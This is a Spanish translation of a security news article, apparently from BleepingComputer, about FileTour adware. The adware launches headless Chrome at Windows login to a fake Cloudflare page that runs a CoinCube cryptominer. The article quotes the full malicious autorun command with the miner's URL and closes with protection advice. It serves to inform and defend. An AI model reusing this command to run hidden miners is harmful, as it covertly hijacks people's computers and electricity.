Adware lanza mineros en el navegador que simula ser Cloudflare

FileTour es un paquete de adware que comúnmente se extiende como grietas o trampas para juegos y otro software

Este paquete es conocido por cruzar la línea entre lo que tradicionalmente se conoce como adware y PUP y otras infecciones informáticas más peligrosas, como troyanos y mineros que roban contraseñas.

Este paquete de adware ha comenzado a crear una ejecución automática de Windows que inicia automáticamente Chrome y se conecta a una página de minería en el navegador cuando un usuario inicia sesión en Windows. Para empeorar las cosas, lo hace de forma tal que Chrome es invisible para el usuario.

El comando utilizado para iniciar Chrome cuando un usuario inicia sesión en Windows es: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4

Este comando hará que Chrome se abra en un estado invisible sin cabeza, sin aceleración de hardware de la GPU, para habilitar la depuración remota en el puerto 9222 y para conectarse automáticamente a https://de-mi-nis-ner2.info/cdn-41.html?t=0.4.

Cuando el navegador abre esta página en segundo plano, ejecutará JavaScript incrustado que inicia una secuencia de comandos miner en el navegador de CoinCube. Esto causará que Chrome aumente hasta un 70-80% de utilización de CPU en el Administrador de tareas, ya que extrae criptomonedas, aunque Windows no esté visible.

Como puede ver, al usar una ventana de minero sin navegador en el navegador, la mayoría de las personas ni siquiera notarán que están infectadas con algo. Sí, es posible que su computadora se sienta lenta y algunos incluso verifiquen el Administrador de tareas y noten el extraño comportamiento de Chrome, pero para la mayoría de los usuarios, este minero puede funcionar durante días, si no semanas, sin ser detectado.

La página de minería del navegador pretende ser una página de verificación de Cloudflare

Si bien la mayoría de las personas no verán el sitio que se abre en una ventana normal del navegador, por supuesto que eché un vistazo. Lo que fue interesante, es que esta página pretende ser una página de verificación anti-DDoS Cloudflare pidiendo a un visitante que confirme que es humano.

Aunque esta página parece una página de verificación de Cloudflare legítima, al hacer clic en la casilla de verificación no se hace nada. Además, la fuente muestra claramente que se está cargando la secuencia de comandos CoinCube, que no es algo que Cloudflare está haciendo.

Protéjase de los mineros en el navegador

Los mineros se están convirtiendo en una epidemia y la exploración minera solo continuará empeorando. Por lo tanto, es importante que todos los usuarios se protejan instalando un software antivirus que detecte cuándo un navegador se conecta a servicios de minería conocidos, como CoinCube.

Desafortunadamente, los nuevos servicios de exploración minera siguen apareciendo y se ha convertido en un juego de whack-a-mole para la industria de la seguridad. Por lo tanto, es posible que su software instalado no detecte la URL o los scripts asociados con un nuevo minero en el navegador.

Para agregar más protección, puede usar un bloqueador de anuncios con Chrome, que bloqueará los scripts de minería en el navegador. Para aquellos que buscan un enfoque más granular, puede usar el sitio CoinBlockerLists para descargar listas de direcciones IP y dominios afiliados a la minería en el navegador.

Semrush sigue a tu competencia


Fecha actualización el 2018-05-17. Fecha publicación el 2018-05-17. Categoría: criptomoneda. Autor: Oscar olg Mapa del sitio Fuente: bleempingcomputer
mineros simula ser Cloudflare